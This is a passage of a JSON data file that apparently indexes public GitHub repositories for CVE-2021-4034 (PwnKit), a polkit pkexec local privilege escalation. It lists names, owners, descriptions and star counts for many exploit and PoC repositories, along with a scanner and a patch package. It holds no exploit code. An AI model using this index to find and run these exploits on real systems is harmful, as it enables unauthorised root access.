+ "name": "CVE-2021-4034-Rust",
+ "full_name": "deoxykev\/CVE-2021-4034-Rust",
+ "owner": {
+ "login": "deoxykev",
+ "id": 37129444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37129444?v=4",
+ "html_url": "https:\/\/github.com\/deoxykev"
+ },
+ "html_url": "https:\/\/github.com\/deoxykev\/CVE-2021-4034-Rust",
+ "description": "Linux LPE using polkit-1 written in Rust. ",
+ "fork": false,
+ "created_at": "2022-01-27T16:28:56Z",
+ "updated_at": "2023-05-02T10:50:59Z",
+ "pushed_at": "2022-02-03T05:17:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452783558,
+ "name": "CVE-2021-4034",
+ "full_name": "c3c\/CVE-2021-4034",
+ "owner": {
+ "login": "c3c",
+ "id": 2326945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2326945?v=4",
+ "html_url": "https:\/\/github.com\/c3c"
+ },
+ "html_url": "https:\/\/github.com\/c3c\/CVE-2021-4034",
+ "description": "Pre-compiled builds for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-27T17:43:24Z",
+ "updated_at": "2024-05-30T10:52:20Z",
+ "pushed_at": "2022-03-30T15:38:20Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452784469,
+ "name": "Pwnkit-exploit",
+ "full_name": "Fato07\/Pwnkit-exploit",
+ "owner": {
+ "login": "Fato07",
+ "id": 40800448,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40800448?v=4",
+ "html_url": "https:\/\/github.com\/Fato07"
+ },
+ "html_url": "https:\/\/github.com\/Fato07\/Pwnkit-exploit",
+ "description": "Exploit for pkexec (CVE-2021-4034) ",
+ "fork": false,
+ "created_at": "2022-01-27T17:46:07Z",
+ "updated_at": "2022-01-27T18:10:33Z",
+ "pushed_at": "2022-01-27T18:32:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452919328,
+ "name": "CVE-2021-4034-NoGCC",
+ "full_name": "EstamelGG\/CVE-2021-4034-NoGCC",
+ "owner": {
+ "login": "EstamelGG",
+ "id": 46676047,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46676047?v=4",
+ "html_url": "https:\/\/github.com\/EstamelGG"
+ },
+ "html_url": "https:\/\/github.com\/EstamelGG\/CVE-2021-4034-NoGCC",
+ "description": "CVE-2021-4034简单优化,以应对没有安装gcc和make的目标环境",
+ "fork": false,
+ "created_at": "2022-01-28T02:54:38Z",
+ "updated_at": "2024-05-09T02:46:11Z",
+ "pushed_at": "2022-02-09T09:58:59Z",
+ "stargazers_count": 75,
+ "watchers_count": 75,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 75,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452924557,
+ "name": "CVE-2021-4034",
+ "full_name": "pengalaman-1t\/CVE-2021-4034",
+ "owner": {
+ "login": "pengalaman-1t",
+ "id": 97300090,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300090?v=4",
+ "html_url": "https:\/\/github.com\/pengalaman-1t"
+ },
+ "html_url": "https:\/\/github.com\/pengalaman-1t\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-28T03:19:57Z",
+ "updated_at": "2022-01-28T03:20:20Z",
+ "pushed_at": "2022-01-28T03:20:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452932780,
+ "name": "CVE-2021-4034-BASH-One-File-Exploit",
+ "full_name": "NeonWhiteRabbit\/CVE-2021-4034-BASH-One-File-Exploit",
+ "owner": {
+ "login": "NeonWhiteRabbit",
+ "id": 97998625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4",
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit"
+ },
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-4034-BASH-One-File-Exploit",
+ "description": "CVE-2021-4034 - One line in the terminal for an instant priv esc to boxes that are vulnerable. See usage.",
+ "fork": false,
+ "created_at": "2022-01-28T03:58:34Z",
+ "updated_at": "2022-02-15T14:37:50Z",
+ "pushed_at": "2022-01-28T21:07:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452937646,
+ "name": "pwnkit-go",
+ "full_name": "jpmcb\/pwnkit-go",
+ "owner": {
+ "login": "jpmcb",
+ "id": 23109390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23109390?v=4",
+ "html_url": "https:\/\/github.com\/jpmcb"
+ },
+ "html_url": "https:\/\/github.com\/jpmcb\/pwnkit-go",
+ "description": "Exploit for the PwnKit vulnerability, CVE-2021-4034, written in Go",
+ "fork": false,
+ "created_at": "2022-01-28T04:24:20Z",
+ "updated_at": "2024-01-13T14:32:48Z",
+ "pushed_at": "2022-01-28T16:23:20Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cybersecurity",
+ "infosec",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452975219,
+ "name": "CVE-2021-4034",
+ "full_name": "JoyGhoshs\/CVE-2021-4034",
+ "owner": {
+ "login": "JoyGhoshs",
+ "id": 36255129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4",
+ "html_url": "https:\/\/github.com\/JoyGhoshs"
+ },
+ "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2021-4034",
+ "description": "Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec ",
+ "fork": false,
+ "created_at": "2022-01-28T07:21:40Z",
+ "updated_at": "2023-12-11T05:33:58Z",
+ "pushed_at": "2022-01-28T08:12:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 453053476,
+ "name": "PwnKit-CVE-2021-4034",
+ "full_name": "galoget\/PwnKit-CVE-2021-4034",
+ "owner": {
+ "login": "galoget",
+ "id": 8353133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4",
+ "html_url": "https:\/\/github.com\/galoget"
+ },
+ "html_url": "https:\/\/github.com\/galoget\/PwnKit-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-28T12:08:25Z",
+ "updated_at": "2022-10-27T19:48:41Z",
+ "pushed_at": "2022-10-27T19:48:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 453070166,
+ "name": "POC-CVE-2021-4034",
+ "full_name": "Yakumwamba\/POC-CVE-2021-4034",
+ "owner": {
+ "login": "Yakumwamba",
+ "id": 72974932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72974932?v=4",
+ "html_url": "https:\/\/github.com\/Yakumwamba"
+ },
+ "html_url": "https:\/\/github.com\/Yakumwamba\/POC-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-28T13:04:22Z",
+ "updated_at": "2022-09-28T07:54:01Z",
+ "pushed_at": "2022-01-28T16:10:39Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453070905,
+ "name": "CVE-2021-4034-Pwnkit",
+ "full_name": "Pr0f3ssor\/CVE-2021-4034-Pwnkit",
+ "owner": {
+ "login": "Pr0f3ssor",
+ "id": 96302619,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96302619?v=4",
+ "html_url": "https:\/\/github.com\/Pr0f3ssor"
+ },
+ "html_url": "https:\/\/github.com\/Pr0f3ssor\/CVE-2021-4034-Pwnkit",
+ "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-28T13:06:45Z",
+ "updated_at": "2022-02-08T22:36:49Z",
+ "pushed_at": "2022-02-08T22:40:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453080818,
+ "name": "CVE-2021-4034",
+ "full_name": "Sakura-nee\/CVE-2021-4034",
+ "owner": {
+ "login": "Sakura-nee",
+ "id": 74785477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74785477?v=4",
+ "html_url": "https:\/\/github.com\/Sakura-nee"
+ },
+ "html_url": "https:\/\/github.com\/Sakura-nee\/CVE-2021-4034",
+ "description": "CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-28T13:38:24Z",
+ "updated_at": "2022-01-28T13:42:53Z",
+ "pushed_at": "2022-06-02T21:17:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453085145,
+ "name": "pwnkit",
+ "full_name": "oreosec\/pwnkit",
+ "owner": {
+ "login": "oreosec",
+ "id": 40876702,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40876702?v=4",
+ "html_url": "https:\/\/github.com\/oreosec"
+ },
+ "html_url": "https:\/\/github.com\/oreosec\/pwnkit",
+ "description": "CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-28T13:51:17Z",
+ "updated_at": "2023-02-11T15:29:59Z",
+ "pushed_at": "2022-01-28T13:59:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453089649,
+ "name": "CVE-2021-4034-POC",
+ "full_name": "CYB3RK1D\/CVE-2021-4034-POC",
+ "owner": {
+ "login": "CYB3RK1D",
+ "id": 37270599,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37270599?v=4",
+ "html_url": "https:\/\/github.com\/CYB3RK1D"
+ },
+ "html_url": "https:\/\/github.com\/CYB3RK1D\/CVE-2021-4034-POC",
+ "description": "pwnkit",
+ "fork": false,
+ "created_at": "2022-01-28T14:04:58Z",
+ "updated_at": "2022-03-15T18:31:39Z",
+ "pushed_at": "2022-04-08T17:26:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453113353,
+ "name": "CVE-2021-4034",
+ "full_name": "Rvn0xsy\/CVE-2021-4034",
+ "owner": {
+ "login": "Rvn0xsy",
+ "id": 19944759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4",
+ "html_url": "https:\/\/github.com\/Rvn0xsy"
+ },
+ "html_url": "https:\/\/github.com\/Rvn0xsy\/CVE-2021-4034",
+ "description": "CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-01-28T15:13:28Z",
+ "updated_at": "2024-06-21T00:09:49Z",
+ "pushed_at": "2022-01-28T15:37:41Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 453114485,
+ "name": "CVE-2021-4034",
+ "full_name": "Kirill89\/CVE-2021-4034",
+ "owner": {
+ "login": "Kirill89",
+ "id": 2003936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4",
+ "html_url": "https:\/\/github.com\/Kirill89"
+ },
+ "html_url": "https:\/\/github.com\/Kirill89\/CVE-2021-4034",
+ "description": "pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-28T15:16:44Z",
+ "updated_at": "2024-03-28T09:35:58Z",
+ "pushed_at": "2022-01-28T15:17:47Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 453145579,
+ "name": "CVE-2021-4034",
+ "full_name": "qq224015\/CVE-2021-4034",
+ "owner": {
+ "login": "qq224015",
+ "id": 17867645,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17867645?v=4",
+ "html_url": "https:\/\/github.com\/qq224015"
+ },
+ "html_url": "https:\/\/github.com\/qq224015\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-28T16:50:45Z",
+ "updated_at": "2022-01-28T16:50:45Z",
+ "pushed_at": "2022-01-28T16:50:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453170577,
+ "name": "CVE-2021-4034",
+ "full_name": "NeonWhiteRabbit\/CVE-2021-4034",
+ "owner": {
+ "login": "NeonWhiteRabbit",
+ "id": 97998625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4",
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit"
+ },
+ "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-4034",
+ "description": "Pwnkit Exploit (CVE-2021-4034), no download capabilty? Copy and paste it!",
+ "fork": false,
+ "created_at": "2022-01-28T18:12:54Z",
+ "updated_at": "2022-09-17T23:36:25Z",
+ "pushed_at": "2022-01-28T18:22:53Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453248251,
+ "name": "PwnKit-CVE-2021-4034",
+ "full_name": "glowbase\/PwnKit-CVE-2021-4034",
+ "owner": {
+ "login": "glowbase",
+ "id": 45991010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45991010?v=4",
+ "html_url": "https:\/\/github.com\/glowbase"
+ },
+ "html_url": "https:\/\/github.com\/glowbase\/PwnKit-CVE-2021-4034",
+ "description": "PwnKit PoC - Local privilege escalation vulnerability for polkit's pkexec utility",
+ "fork": false,
+ "created_at": "2022-01-28T23:36:36Z",
+ "updated_at": "2022-02-06T01:20:03Z",
+ "pushed_at": "2022-02-06T01:20:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453321788,
+ "name": "polkit-0.96-CVE-2021-4034",
+ "full_name": "sofire\/polkit-0.96-CVE-2021-4034",
+ "owner": {
+ "login": "sofire",
+ "id": 1177330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1177330?v=4",
+ "html_url": "https:\/\/github.com\/sofire"
+ },
+ "html_url": "https:\/\/github.com\/sofire\/polkit-0.96-CVE-2021-4034",
+ "description": "centos 6.10 rpm for fix polkit CVE-2021-4034; centos 6.10的rpm包,修复CVE-2021-4034 漏洞",
+ "fork": false,
+ "created_at": "2022-01-29T06:54:49Z",
+ "updated_at": "2023-09-14T08:12:53Z",
+ "pushed_at": "2022-01-29T08:09:07Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "polkit"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453347135,
+ "name": "pwnkit-scanner",
+ "full_name": "codiobert\/pwnkit-scanner",
+ "owner": {
+ "login": "codiobert",
+ "id": 10519412,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10519412?v=4",
+ "html_url": "https:\/\/github.com\/codiobert"
+ },
+ "html_url": "https:\/\/github.com\/codiobert\/pwnkit-scanner",
+ "description": "Check CVE-2021-4034 vulnerability",
+ "fork": false,
+ "created_at": "2022-01-29T09:03:34Z",
+ "updated_at": "2022-01-30T16:36:54Z",
+ "pushed_at": "2022-01-30T16:50:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 453431266,
+ "name": "CVE-2021-4034",
+ "full_name": "v-rzh\/CVE-2021-4034",
+ "owner": {
+ "login": "v-rzh",
+ "id": 81850032,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81850032?v=4",
+ "html_url": "https:\/\/github.com\/v-rzh"
+ },
+ "html_url": "https:\/\/github.com\/v-rzh\/CVE-2021-4034",
+ "description": "Exploit for the PwnKit Vulnerability",
+ "fork": false,
+ "created_at": "2022-01-29T15:07:50Z",
+ "updated_at": "2022-01-29T15:17:29Z",
+ "pushed_at": "2022-01-30T12:58:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "exploit",
+ "pwnkit"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453504555,
+ "name": "PwnKit-Vulnerability_CVE-2021-4034",
+ "full_name": "TW-D\/PwnKit-Vulnerability_CVE-2021-4034",
+ "owner": {
+ "login": "TW-D",
+ "id": 75358550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75358550?v=4",
+ "html_url": "https:\/\/github.com\/TW-D"
+ },
+ "html_url": "https:\/\/github.com\/TW-D\/PwnKit-Vulnerability_CVE-2021-4034",
+ "description": "PwnKit - Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-29T19:59:24Z",
+ "updated_at": "2022-01-29T20:01:43Z",
+ "pushed_at": "2022-01-30T07:26:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 453510021,
+ "name": "ez-pwnkit",
+ "full_name": "OXDBXKXO\/ez-pwnkit",
+ "owner": {
+ "login": "OXDBXKXO",
+ "id": 18035000,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18035000?v=4",
+ "html_url": "https:\/\/github.com\/OXDBXKXO"
+ },
+ "html_url": "https:\/\/github.com\/OXDBXKXO\/ez-pwnkit",
+ "description": "Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-29T20:24:43Z",
+ "updated_at": "2024-04-11T15:02:38Z",
+ "pushed_at": "2022-02-23T21:54:41Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-4034",
+ "exploit",
+ "go",
+ "golang",
+ "golang-package",
+ "linux",
+ "local-privilege-escalation",
+ "lpe",
+ "pkexec",
+ "pwnkit"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453521330,
+ "name": "dissecting-pkexec-cve-2021-4034",
+ "full_name": "milot\/dissecting-pkexec-cve-2021-4034",
+ "owner": {
+ "login": "milot",
+ "id": 116471,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116471?v=4",
+ "html_url": "https:\/\/github.com\/milot"
+ },
+ "html_url": "https:\/\/github.com\/milot\/dissecting-pkexec-cve-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-29T21:20:14Z",
+ "updated_at": "2022-01-30T10:27:02Z",
+ "pushed_at": "2022-01-30T10:25:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453533841,
+ "name": "CVE-2021-4034-",
+ "full_name": "0x01-sec\/CVE-2021-4034-",
+ "owner": {
+ "login": "0x01-sec",
+ "id": 93550527,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93550527?v=4",
+ "html_url": "https:\/\/github.com\/0x01-sec"
+ },
+ "html_url": "https:\/\/github.com\/0x01-sec\/CVE-2021-4034-",
+ "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-29T22:28:52Z",
+ "updated_at": "2022-12-07T16:48:03Z",
+ "pushed_at": "2022-01-29T23:29:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453575588,
+ "name": "CVE-2021-4034-PwnKit",
+ "full_name": "navisec\/CVE-2021-4034-PwnKit",
+ "owner": {
+ "login": "navisec",
+ "id": 82182980,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82182980?v=4",
+ "html_url": "https:\/\/github.com\/navisec"
+ },
+ "html_url": "https:\/\/github.com\/navisec\/CVE-2021-4034-PwnKit",
+ "description": "PwnKit PoC for Polkit pkexec CVE-2021-4034 ",
+ "fork": false,
+ "created_at": "2022-01-30T03:08:51Z",
+ "updated_at": "2024-05-24T08:48:55Z",
+ "pushed_at": "2022-01-30T04:48:57Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 453650253,
+ "name": "pkexec-exploit",
+ "full_name": "Almorabea\/pkexec-exploit",
+ "owner": {
+ "login": "Almorabea",
+ "id": 13198863,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4",
+ "html_url": "https:\/\/github.com\/Almorabea"
+ },
+ "html_url": "https:\/\/github.com\/Almorabea\/pkexec-exploit",
+ "description": "pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-30T10:34:28Z",
+ "updated_at": "2024-06-02T05:14:49Z",
+ "pushed_at": "2022-01-30T10:44:34Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 453933411,
+ "name": "Polkit-pkexec-exploit-for-Linux",
+ "full_name": "teelrabbit\/Polkit-pkexec-exploit-for-Linux",
+ "owner": {
+ "login": "teelrabbit",
+ "id": 55339121,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55339121?v=4",
+ "html_url": "https:\/\/github.com\/teelrabbit"
+ },
+ "html_url": "https:\/\/github.com\/teelrabbit\/Polkit-pkexec-exploit-for-Linux",
+ "description": "CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-31T08:44:12Z",
+ "updated_at": "2022-01-31T08:57:24Z",
+ "pushed_at": "2022-01-31T08:57:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 454373696,
+ "name": "PoC-CVE-2021-4034",
+ "full_name": "scent2d\/PoC-CVE-2021-4034",
+ "owner": {
+ "login": "scent2d",
+ "id": 45614318,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45614318?v=4",
+ "html_url": "https:\/\/github.com\/scent2d"
+ },
+ "html_url": "https:\/\/github.com\/scent2d\/PoC-CVE-2021-4034",
+ "description": "Pwnkit CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-02-01T12:11:19Z",
+ "updated_at": "2022-02-01T12:34:47Z",
+ "pushed_at": "2022-02-01T12:37:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 454654761,
+ "name": "CVE-2021-4034",
+ "full_name": "HrishitJoshi\/CVE-2021-4034",
+ "owner": {
+ "login": "HrishitJoshi",
+ "id": 60515873,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60515873?v=4",
+ "html_url": "https:\/\/github.com\/HrishitJoshi"
+ },
+ "html_url": "https:\/\/github.com\/HrishitJoshi\/CVE-2021-4034",
+ "description": "PWNKIT - Local Privilege Escalation Vulnerability on Linux (Polkit)",
+ "fork": false,
+ "created_at": "2022-02-02T05:31:42Z",
